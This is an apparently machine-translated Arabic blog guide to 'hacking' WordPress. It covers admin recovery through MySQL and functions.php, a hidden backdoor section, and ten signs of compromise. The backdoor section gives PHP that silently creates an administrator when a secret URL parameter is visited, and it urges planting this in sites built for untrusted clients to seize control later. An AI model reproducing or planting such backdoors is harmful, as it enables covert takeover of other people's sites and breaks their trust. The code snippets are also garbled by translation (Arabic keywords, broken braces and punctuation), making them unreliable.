كيفية الاختراق في موقع WordPress ، الدليل الكامل

كيفية اختراق موقع WordPress ، الدليل الكامل


نحن لا نتغاضى عن أي سلوك غير قانوني أو ضار أو نوافق عليه أو نشجعه! الغرض من هذه المقالة هو شرح كيفية اختراق أو استعادة الوصول إلى موقع WordPress الخاص بك ، أو أن لديك حقوق التحرير والإشراف والوصول. مهما فعلت ، فأنت تفعل ذلك بنفسك. نحن لسنا مسؤولين عن أفعالك. يخدم هذا الدليل فقط للأغراض التعليمية.

ستساعدك الأساليب الموصوفة على استعادة الوصول إلى الموقع حتى إذا لم يعد لديك حساب ، ولكنك ستحتاج إلى بعض المعلومات حول الموقع ولن تساعدك في اختراق أي تثبيت عشوائي لـ WordPress.

في هذا الدليل ، نحن على وشك أن نعرض لك:

  • كيفية اختراق موقع ووردبريس
  • كيفية إنشاء باب خلفي في WordPress
  • كيفية إنشاء حساب مستخدم جديد عبر FTP
  • 10 علامات تشير إلى اختراق موقع WordPress الخاص بك

كيفية اختراق موقع WordPress ، الدليل الكامل

الحالات التي يمكن أن تساعد نفسك فيها

إذا كنت في أحد المواقف التالية ، فستساعدك طرقنا على استعادة الوصول:

  • نسيت اسم المستخدم أو عنوان البريد الإلكتروني
  • لا يعمل خيار إعادة تعيين كلمة المرور على خادم الاستضافة
  • إعادة تعيين رسائل البريد الإلكتروني كلمة المرور لا تأتي
  • لم يعد بإمكانك الوصول إلى عنوان البريد الإلكتروني للحساب
  • أنت تعرف اسم المستخدم وكلمة المرور ، ولكن التركيبة لا تعمل

لاستخدام الطرق الموضحة أدناه ، ستحتاج فقط واحد مما يلي:

  • وصول FTP إلى الخادم ، أو
  • وصول cPanel إلى الخادم ، أو
  • الوصول إلى قاعدة بيانات MySQL والقدرة على الاتصال بها عن بعد

الطريقة # 1 – طريقة MySQL

استخدم هذه الطريقة لتغيير كلمة المرور (أو اسم المستخدم إذا لزم الأمر) لمستخدم حالي أو لإنشاء حساب جديد. ستحتاج إلى وصول cPanel أو وصول MySQL مباشر إلى قاعدة بيانات الموقع. فلنبدأ بتغيير كلمة مرور المستخدم الحالي.

إذا كنت تستخدم cPanel ، فقم بتسجيل الدخول (يمكن دائمًا الوصول إلى cPanel عبر https://yoursite.com:2083 الرابط) ، حدد موقع وفتح phpMyAdmin. قائمة قواعد البيانات والجداول على اليسار. أنت تبحث عن الجدول الذي ينتهي بـ _users. من المحتمل أن يكون wp_users, ولكن إذا كان لديك أكثر من موقع WordPress مثبت على الخادم ، فعليك العثور على الموقع الصحيح.

سيحتوي الجدول الصحيح على المستخدم الذي تريد تحريره فيه. اتبع نفس الإجراء إذا كنت تتصل بـ MySQL عبر عميل خارجي مثل SQLyog. بمجرد تحديد موقع الجدول وسجل المستخدم الفعلي ، حان الوقت لتغيير كلمة المرور.

كما كنت قد اكتشفت الآن ، يتم حفظ كلمة المرور في تمرير المستخدم المجال ، تم تجزئته باستخدام خوارزمية MD5. افتح ال مولد MD5 على الإنترنت أدخل كلمة المرور التي تريد استخدامها وانقر على “هاش”. انسخ السلسلة التي تم إنشاؤها واستبدل كلمة المرور الأصلية معها. في phpMyAdmin ، يمكنك تعديل الحقل بالنقر المزدوج عليه. الإجراء مشابه في عملاء MySQL الآخرين. حفظ التغييرات وتسجيل الدخول إلى WordPress باستخدام كلمة المرور الجديدة.

جدول مستخدمي الفسفور الابيض

يتم تخزين أسماء المستخدمين وكلمات المرور المجزأة ورسائل البريد الإلكتروني في wp_users جدول قاعدة البيانات

لا يزال على الطريقة رقم 1 – إنشاء مستخدم جديد

يعد إنشاء مستخدم جديد أكثر تعقيدًا بعض الشيء ولكنه لا يزال قابلاً للإدارة في أقل من دقيقة. قم بإنشاء سجل جديد في جدول المستخدمين وتعبئة: user_login و user_pass (مجزأة باستخدام وظيفة MD5 الموضحة أعلاه) و user_email. يمكن أن تبقى جميع الحقول الأخرى فارغة ؛ لا يهم. احفظ السجل الجديد. بمجرد حفظها ، ستعطيها MySQL معرفًا فريدًا. إنه الرقم في حقل المعرف. تذكر ذلك.

اذهب الآن إلى _usermeta الطاولة. تذكر, يجب أن تكون بادئة الجدول هي نفسها بادئة المستخدمين. على سبيل المثال wp_users و wp_usersmeta. إذا لم تكن البادئة هي نفسها ، فأنت تعدل الجدول الخاطئ (لبعض تثبيتات WP الأخرى) ولن يعمل الحساب الجديد. سننشئ سجلين جديدين. تجاهل umeta_id المجال لكليهما. جلس معرف المستخدم الحقل إلى القيمة التي تذكرتها للتو (قيمة المعرّف الجديدة في جدول المستخدمين). لمجموعة السجلات الأولى مفتاح التعريف إلى wpct_user_level و meta_value إلى 10. للمرة الثانية مفتاح التعريف إلى wpct_capabilities و meta_value إلى أ: 1: {ق: 13: "مسؤول" ؛ ب: 1 ؛}. حفظ كليهما. لقد انتهيت – تسجيل الدخول!

الطريقة رقم 2 – طريقة function.php

يمكن استخدام هذا الأسلوب إما عن طريق تحرير jobs.php من خلال cPanel أو باستخدام عميل FTP للقيام بذلك. في حالة استخدام cPanel ، ابحث عن File Manager وافتحه. أولاً ، يجب أن نجد مجلد السمة النشطة.

اذهب إلى public_html / wp_content / السمات مجلد. إذا رأيت على الفور موضوعك وتعرف أيهما – رائع. افتح مجلده وابدأ التحرير function.php. إذا لم يكن الأمر كذلك ، افتح الموقع ، وانقر بزر الماوس الأيمن في أي مكان ، وحدد “عرض المصدر”. ثم اضغط على Ctrl + F وابدأ في الكتابة / المواضيع / قريبًا ، سيتم تمييز الكثير من عناوين URL ، وستتعرف على اسم المجلد الخاص بالموضوع النشط.

ابحث عنه في بنية الملف وافتحه وابدأ التحرير function.php. انسخ / الصق الكود التالي في نهاية الملف. تمانع في الإغلاق ?> علامات PHP إذا كان لديك. يجب أن يكونوا على السطر الأخير. لذا أدخل الكود قبلهم.

$ new_user_email = '[email protected]'؛
$ new_user_password = '12345' ،

إذا (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email، $ new_user_password، $ new_user_email) ؛

wp_update_user (المصفوفة ('ID' => $ user_id، 'nickname' => $ new_user_email)) ؛

$ user = new WP_User ($ user_id) ؛
$ user-> set_role ('المسؤول') ؛
}}

قم بتحرير أول سطرين فقط من الكود ليعكس حسابك الجديد. إذا كان هناك مستخدم بالفعل في WP لديه هذا البريد الإلكتروني ، فلن يتم إنشاء حساب جديد ، لذا تأكد من أنه جديد. قم بتغيير كلمة المرور أيضًا – لا تتعرض للاختراق من قبل أطفال البرامج النصية. بعد حفظ الملف ، افتح موقعك ببساطة ، سيتم تشغيل الرمز ، وسيتم إنشاء حساب جديد بامتيازات المشرف وستتمكن من تسجيل الدخول باستخدامه.

بعد القيام بذلك ، تذكر حذف الرمز من function.php.

طرق القرصنة الأخرى

من خلال معرفة كلمة مرور FTP أو cPanel أو MySQL فأنت تثبت أن لديك حق وصول شرعي إلى الخادم وبالتالي يجب أن يكون لديك حق الوصول إلى تثبيت (عمليات) تثبيت WordPress أيضًا. إذا لم يكن لديك أي من هذه الحسابات ، فأنت لست على ما يرام (اختراق مواقع الأشخاص الآخرين) ، وهذا ليس جيدًا!

يرجى تذكر أن الوصول غير المصرح به إلى أي أجهزة كمبيوتر أو مواقع أو خوادم يعد جريمة خطيرة ويتم التعامل معه على الفور في معظم البلدان.

إذا كنت خائفًا من اختراق موقع WordPress الخاص بك ، فالرجاء التحقق من هذه الصفحة باستخدام ماسح أمان WordPress مجاني. إذا لم يكن لديك الوقت لإعداد مدونتك ، فدعنا نقوم بذلك نيابة عنك.

كيفية إنشاء باب خلفي في WordPress

عند إغلاق الباب الأمامي ، يمكنك تجربة الباب الخلفي. قد يبدو هذا طريقة خبيثة لاستخدام الرمز للدخول إلى الموقع دون الوصول إليه ، ولكن هناك في الواقع أوقات تحتاج فيها إلى التحكم في موقعك إذا سرقه شخص ما.

إذا كان يقوم بإنشاء مواقع ويب لأشخاص آخرين تقوم بشيء تفعله ، فسيكون هناك عميل يرفض أن يدفع لك مقابل عملك ، عاجلاً أم آجلاً. عميل يقوم بحذف معلومات تسجيل الدخول وسيتحكم في كل ما قمت به. في بعض الأحيان ، يكفي إنشاء مستخدم جديد عبر FTP أو إعادة تعيين كلمة المرور. عندما لا يكون ذلك كافيا, قد ترغب في اختراق طريقك للعودة أو إنشاء وصول مستتر إلى صفحات المشرف الخاصة بك.

ولكن إذا قررت إخفاء جزء صغير من التعليمات البرمجية في بيئة WordPress الخاصة بك ، فقد تنقذ نفسك بعض الكرامة و الوصول إلى موقع WordPress مع امتيازات المسؤول. وهنا تبدأ الألعاب.

بغض النظر عن عدد المرات التي يقوم فيها هذا اللص بحذف معلوماتك أو استعادة نسخة احتياطية على خادم يملكه على الأرجح ، هناك فرصة أنه لا يعرف أي شيء عن مداخل الباب الخلفي. إذا فعل ذلك ، فربما لن يحتاج حتى إلى مساعدتك في إعداد WordPress ، صحيح?

إنشاء باب خلفي:

حسنًا ، يكفي الكلام. في ما يلي جزء من الرمز ستحتاج إليه لإنجاز المهمة:

  1. افتح ملف function.php
  2. نسخ / لصق التعليمات البرمجية التالية:
  3. add_action ('wp_head'، 'wploop_backdoor')؛
    دالة wploop_backdoor () {
    إذا ($ _GET ['backdoor'] == 'knockknock') {
    تتطلب ('wp-include / registration.php') ؛
    If (! username_exists ('username')) {
    $ user_id = wp_create_user ('name'، 'pass')؛
    $ user = new WP_User ($ user_id) ؛
    $ user-> set_role ('المسؤول') ؛
    }}
    }}
    }}
    ?>
  4. احفظ التغييرات

إذا تركت الرمز كما هو ، فكل ما عليك فعله لإنشاء مسؤول جديد على الموقع هو زيارة http://www.yourdomain.com/؟backdoor=knockknock

بعد تحميل الصفحة ، اسم المستخدم الجديد هو “اسم” وكلمة المرور “البشري”.

بالطبع بكل تأكيد, يمكنك تغيير ذلك في التعليمات البرمجية أعلاه بتغيير “الاسم” و “تمرير” إلى أي شيء تريده. يمكنك أيضًا تغيير الرابط إلى بابك الخلفي عن طريق تغيير “الباب الخلفي” و / أو “knockknock” إلى أي شيء توصل إليه.

جرب الوظيفة – ليس فقط أنها ممتعة ولكن يمكن أن تساعدك حقًا في وقت ما في المستقبل عندما تكون على وشك إنشاء موقع ويب لشخص لا يمكنك الوثوق به تمامًا. يجب عليك أيضًا رفع مستوى WordPress ومهارات التدوين الخاصة بك.

كيفية إنشاء حساب مستخدم جديد عبر FTP

إنشاء حسابات مستخدمين جديدة على WordPress أمر سهل للغاية. بصفتك مشرفًا ، يلزمك ذلك انتقل إلى صفحة إدارة المستخدمين حيث يمكنك إنشاء حساب جديد لأي دور مستخدم. يمكن القيام بذلك في غضون ثوان ويمكن للمستخدم الذي تم إنشاؤه حديثًا تسجيل الدخول على الفور باستخدام اسم المستخدم وكلمة المرور المحددين.

ولكن ماذا يحدث إذا فقدت الوصول إلى مسؤول WordPress الخاص بك؟ قد تصبح الأمور أكثر تعقيدًا بعض الشيء ، ولكن لا تقلق – لدينا وظيفة لك يمكن أن تنقذ حياة المشرف.

سواء حذف مسؤول آخر حسابك ، سواء كنت قد حذفت جميع المستخدمين من قاعدة البيانات عن طريق الخطأ ، أو استخدمت مكونًا إضافيًا معطلاً أو تعرضت للاختراق ، فلا يزال بإمكانك استعادة السيطرة. في بعض الأحيان قد تتمكن من الوصول إلى خادم FTP فقط بينما يكون HTTP واحد بعيدًا عن متناولك وستحتاج إلى إنشاء مسؤول جديد. في حين أن هذه قد تكون حالة نادرة ، فإن الوظيفة التالية ستوفر لك.

لإنشاء حساب جديد خارج بيئة إدارة WordPress, كل ما ستحتاجه هو وصول FTP إلى موقعك. بصفتك مشرفًا ، يجب أن يكون لديك جميع المعلومات المطلوبة لتسجيل الدخول إلى الخادم الخاص بك ويمكنك إنشاء حساب جديد بسرعة عن طريق إنشاء وظيفة جديدة في السمة الخاصة بك.

قم بإنشاء حساب مستخدم جديد عبر FTP:

  1. افتح عميل FTP واتصل بحسابك
  2. انتقل إلى wp-content / السمات
  3. افتح مجلد السمة التي تستخدمها
  4. ابحث عن ملف function.php وقم بتحريره
  5. انسخ والصق الوظيفة التالية:
  6. وظيفة admin_account () {
    $ user = 'Username'؛
    $ pass = 'Password'؛
    $ email = '[email protected]'؛
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user ، $ pass ، $ email) ؛
    $ user = new WP_User ($ user_id) ؛
    $ user-> set_role ('المسؤول') ؛
    }}
    add_action ('init'، 'admin_account')؛
    
  7. قم بتغيير اسم المستخدم وكلمة المرور والبريد الإلكتروني إلى شيء فريد
  8. احفظ التغييرات

تأكد من أن اسم المستخدم وكلمة المرور وعنوان البريد الإلكتروني الذي قمت بتعيينه في الوظيفة فريدة وإلا لن تعمل الوظيفة بشكل صحيح. بمجرد حفظ التغييرات ، تكون قد انتهيت ويمكنك الانتقال إلى لوحة تسجيل دخول WP الخاصة بك. استخدم معلومات جديدة لتسجيل الدخول مرة أخرى وبمجرد التحقق من الحساب ، يمكنك حذف الوظيفة من ملف jobs.php.

تعمل الوظيفة الموضحة أعلاه على إنشاء حساب مسؤول ، ولكن يمكنك تعديله بسهولة لإنشاء حساب بأي دور مستخدم آخر. ببساطة تغيير الدور على 8العاشر صف من التعليمات البرمجية إلى المحرر أو المؤلف أو المساهم أو المشترك أو أي دور مستخدم آخر قمت بإنشائه.

للأسف ، إذا فقدت حساب المشرف الخاص بك ، فستفقد أيضًا جميع المشاركات المكتوبة تحت اسم المستخدم هذا. لهذا السبب يجب عليك دائمًا الاحتفاظ بنسخة احتياطية يمكنك استردادها بسهولة. إذا كنت تقرأ هذا أثناء امتلاكك لحساب المشرف, خذ هذا كتذكير لإنشاء نسخة احتياطية على الفور وضع إشارة مرجعية على هذه المقالة في حالة احتياجك لإنشاء حساب خارج WordPress في المستقبل.

10 علامات تشير إلى اختراق موقع WordPress الخاص بك

WordPress هي منصة تدوين ضخمة. هناك الملايين من المستخدمين ، ويبدو أن العدد ينمو بسرعة كل يوم. يميل الأشخاص حتى إلى نقل مواقعهم الإلكترونية التي تم إنشاؤها في أنظمة إدارة المحتوى الأخرى إلى نظام المصدر المفتوح هذا أكثر مما تعتقد. وبينما هذا جيد ، هذا يعني ذلك سيضع المخترقون أيضًا WordPress في مكان واحد عند محاولة غزو مواقع عشوائية.

عادة ، إذا تعرضت للاختراق ، فستعرف ذلك على الفور. سيتعذر الوصول إلى موقعك ؛ لن تتمكن من تسجيل الدخول وأحيانًا سيترك مخترق رسالة على الصفحة الأولى. لكن في أكثر الأحيان, قد لا تلاحظ حتى أن شيئًا قد تغير. في هذا الجزء من المقالة ، نحن على وشك أن نعرض لك العديد من العلامات التي قد تظهر لك أنه تم اختراق موقع WordPress الخاص بك وبعض الحلول للمشكلة.

1. تسجيل دخول غير ناجح

هذه العلامة واضحة إلى حد كبير. إذا كنت قد استخدمت تركيبة اسم المستخدم وكلمة المرور لفترة من الوقت دون مواجهة مشكلة ، فقد تشعر بالريبة إذا لم يتعرف WordPress فجأة على حسابك. إذا تمكن أحد المتسللين من تسجيل الدخول إلى موقعك ، فمن المحتمل أنه سيغير امتيازات المشرف الخاصة بك بسرعة.

ربما يجب عليه تغيير كلمة المرور الخاصة بك أو حذف حسابك بالكامل. قبل أن تبدأ في الذعر بعد المرة الأولى التي يرسل فيها WordPress رسائل إليك حول اسم مستخدم / كلمة مرور غير صحيحة ، يرجى مراعاة حقيقة أنك ربما أدخلت تركيبة خاطئة أو أنك قد قمت بتشغيل زر caps lock.

المحلول: حاول استرداد كلمة المرور عبر البريد الإلكتروني أو استخدم حسابًا آخر لتسجيل الدخول مرة أخرى. للتأكد من أن تسجيل الدخول يبقى آمنًا ، نوصي بتثبيت تسجيل الدخول النينجا البرنامج المساعد لوورد.

2. تتم إضافة محتوى ضار إلى موقعك

يحتوي الموقع على تحذير من البرامج الضارة

إذا بدأت في ملاحظة محتوى غير مألوف على موقعك ، فقد تبدأ في القلق. عندما يحصلون على فرصة للوصول إلى منطقة الإدارة الخاصة بك, سيتمكن المتسللون من تغيير قلبك وملفات السمة والمكون الإضافي. هذا يعني أنه يمكنهم تغيير أي شيء يريدونه.

بينما يقوم بعض المتسللين بتعديل مظهر موقعك بشكل كبير وربما حتى يوضحون أنك تعرضت للاختراق ، سيكون الآخرون أكثر دقة في ذلك.

المحلول: حاول البحث عن محتوى مخفي في رمز الموقع. قد تكون هناك روابط إلى قراصنة مواقع ضارة مزروعة في تذييل موقعك ، أو ربما قاموا بتثبيت النوافذ المنبثقة التي سيتم فتحها بشكل منتظم لعملائك. استخدم Security Ninja لفحص موقعك أو مراقبة موقعك باستمرار بحثًا عن مثل هذه المشاكل.

3. الزيارات المشبوهة

إذا كنت لا تتبع موقع الويب الخاص بك ، يجب أن تبدأ في القيام بذلك على الفور. طريقة بسيطة للقيام بذلك هي استخدام Google Analytics ، والذي من بين العديد من الميزات الأخرى ، يمكن أن يخبرك بعدد الزيارات التي تحصل عليها وأين تأتي هذه الزيارات. بعد مرور بعض الوقت ، ستتعرف على موقع الويب الخاص بك. وهذا يعني أنك ستعرف من أين تأتي الزيارات ، وستعرف متى تطلق حملة جديدة وعندما يتم إصدار روابط ترويجية جديدة في البرية.

ولكن إذا لاحظت فجأة أن موقعك يحصل على عدد كبير من الزيارات الجديدة من المجال المريب, ستحتاج إلى مزيد من التحقيق في ذلك لأن موقعك قد يتعرض للاختراق. عادةً ، سيؤدي هذا النوع من الزيارات إلى معدل ارتداد 100٪ مما يعني أنه تم الوصول إلى صفحة واحدة فقط. سيستخدم المخترقون بشكل متكرر أنظمة آلية تؤدي إلى مواقع سيئة أخرى إلى مواقعك. سواء أكانت رمزًا سيئًا يتم تنفيذه على موقعك أو أصبحت جزءًا من شبكة غير مرغوب فيها ، فقد تصبح الأمور خطيرة ، وسيتعين عليك التحقق من موقعك بحثًا عن شفرة ضارة.

المحلول: استعمال أدوات مشرفي المواقع من Google للعثور على المجالات المشبوهة

4. انخفاض مفاجئ في حركة المرور

التصفح الآمن في حالة الموقع

على عكس آخر إشارة مذكورة على الاختراق ، قد تنبهك هذه العلامة بسبب حدوث انخفاض مفاجئ في عدد الزيارات. بدلاً من إحالة زيارات جديدة إليك, قد يرسل المخترق زيارات بعيدًا عن موقعك. قد يحدث هذا لأن أحد المخترقين أعاد توجيه موقعك إلى موقع آخر. السبب الآخر للحصول على عدد أقل من الزوار هو أن Google أدرجت موقعك في القائمة السوداء. سيعرض هذا الإجراء رسالة لكل مستخدم قد يختار عدم فتح موقعك لأنه مصاب.

المحلول: استخدم Google حالة موقع التصفح الآمن للتحقق مما إذا تم وضع علامة على موقعك على أنه غير آمن ومن الخطر زيارته حاليًا.

5. نتائج محرك البحث غريبة

إذا لم تلاحظ أي تغييرات على موقعك ، ولكنك تكتشف أن نتائج البحث في Google ومحركات البحث الأخرى غريبة (عرض عناوين مختلفة وبيانات تعريفية أخرى) ، فقد تكون هذه علامة واضحة على موقع تم اختراقه. ربما يكون المخترق قد غيّر المحتوى الخاص بك بطريقة لا يمكن رؤيتها إلا للخبير. ومع ذلك ، سيكون التغيير مرئيًا في نتائج محرك البحث.

المحلول: تحقق من موقعك باستخدام أدوات مشرفي المواقع من Google, وتحقق مما إذا تم اختراق موقعك بهذا أداة مجانية على الإنترنت.

6. لا يمكنك إرسال / استقبال رسائل البريد الإلكتروني

بمجرد أن يتمكن المخترق من الوصول إلى موقعك ، فربما يرغب في ذلك استخدم خادمك لإرسال رسائل غير مرغوب فيها إلى أي شخص آخر. عندما تكتشف أنه لا يمكنك إرسال أو استقبال رسائل بريد إلكتروني جديدة من WordPress الخاص بك ، يمكن أن يكون هذا علامة واضحة على تعرضك للاختراق. تحقق من بريدك الإلكتروني مرة أخرى ، ثم تحقق منه مع مزود الخدمة للتأكد من عدم وجود أي أخطاء.

المحلول: اختبار وورد الخاص بك وظيفة البريد مع هذا البرنامج المساعد المجاني.

7. الموقع غير موجود

لم يتم العثور على الخادم

في بعض الأحيان لا يتمكن المخترقون من الوصول إلى موقعك لزرع شفرة ضارة أو إعادة توجيه المستخدمين أو استخدام بريدك الإلكتروني للرسائل غير المرغوب فيها. بعض الأحيان, كل ما يريدون فعله هو تعطل موقعك. نادرًا ما يحذف المخترق كل شيء من الخادم بالكامل. لهذا السبب ، من المهم أن تستضيف ملفاتك في شركة استضافة شهيرة ستأخذ الأمان وتحتفظ أيضًا بنسخ احتياطية يومية أو أسبوعية على الأقل من موقعك على الويب. إنها ممارسة جيدة أن تقوم أيضًا بعمل نسخ احتياطية خاصة بك من وقت لآخر حتى يمكن استعادة الموقع بسرعة.

المحلول: قم بتثبيت أحد أفضل المكونات الإضافية لإدارة النسخ الاحتياطي في WordPress.

8. الملفات المشبوهة

على غرار المحتوى الضار الذي يمكن إضافته إلى الملفات الموجودة, قد يقوم المخترق بزرع ملفات إضافية في أي مكان داخل مجلد الجذر الخاص بك. من الجيد أن تعرف طريقك حول WordPress ، ولكن إذا لم تكن من ذوي الخبرة ، فيجب أن يكون لديك أداة أمان تحت تصرفك يمكنها التحقق من جميع ملفاتك وأنشطتك. قمنا مؤخرًا بمراجعة Security Ninja وهو أداة مثالية للتحقق من جميع ملفات WordPress الخاصة بك.

المحلول: حاول البحث عن الملفات التي لا تنتمي إلى تثبيت WordPress الخاص بك. استخدم Security Ninja لفحص موقعك بشكل منتظم والعثور على هذه الملفات تلقائيًا. ثم احذف الملفات أو قم بإزالة التعليمات البرمجية الضارة من الملفات المصابة. لا تنس إضافة Core Scanner الإضافية لـ Security Ninja.

9. أعضاء جدد

اعتمادًا على موقعك ، قد تكون الشخص الوحيد القادر على إضافة أعضاء جدد. في هذه الحالة ، قد تؤدي رسالة بريد إلكتروني تخبرك عن المستخدمين المسجلين حديثًا إلى إطلاق إنذار. إذا كان هناك مشرفون آخرون لديهم القدرة على إضافة أعضاء جدد ، فراجع معهم حول النشاط المريب.

المحلول: تغيير عنوان URL لتسجيل الدخول باستخدام مكون إضافي مجاني ، وتقييد الوصول إلى صفحة تسجيل الدخول إلى WordPress الخاصة بك باستخدام ملف .htpasswd واستخدام تسجيل الدخول Ninja لحماية نموذج تسجيل الدخول الخاص بك طوال الوقت.

10. تحقق من الأحداث المجدولة على الخادم الخاص بك

في بعض الأحيان ، لن يفعل المخترق شيئًا على موقعك على الويب بمجرد العثور على طريقه. بدلاً من ذلك, سيغادرون الأحداث المجدولة مما قد يضر بموقعك في وقت ما في المستقبل. هذه التقنية خطيرة لأن المخترق يمكن أن يترك ضحية الخبرة عديم الخبرة في البداية. قد تكون مصابًا ولا تعرف شيئًا عنه.

المحلول: تحقق من وظائف CRON على خادم تستخدمه وتأكد من عدم وجود مهام مجدولة مشبوهة.

تغليف

نأمل أن تساعدك هذه المقالة في إدارة موقع WordPress أكثر أمانًا ، وأن تساعدك على استعادة الوصول إليه في المواقف السيئة. و حتى إذا كان موقعك نظيفًا ، فيرجى عدم اعتبار ذلك أمرًا مسلمًا به.
تأكد دائمًا من أن مدونتك آمنة قدر الإمكان. نقترح الإضافات الأمنية لـ WordPress والتي يمكن أن توفر لك في معظم الأوقات. مع ذلك ، لا تكن الشخص الذي يستخدم كلمة مرور غير آمنة ، وكن حذرًا عند اختراق موقع WordPress الخاص بك.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Liked Liked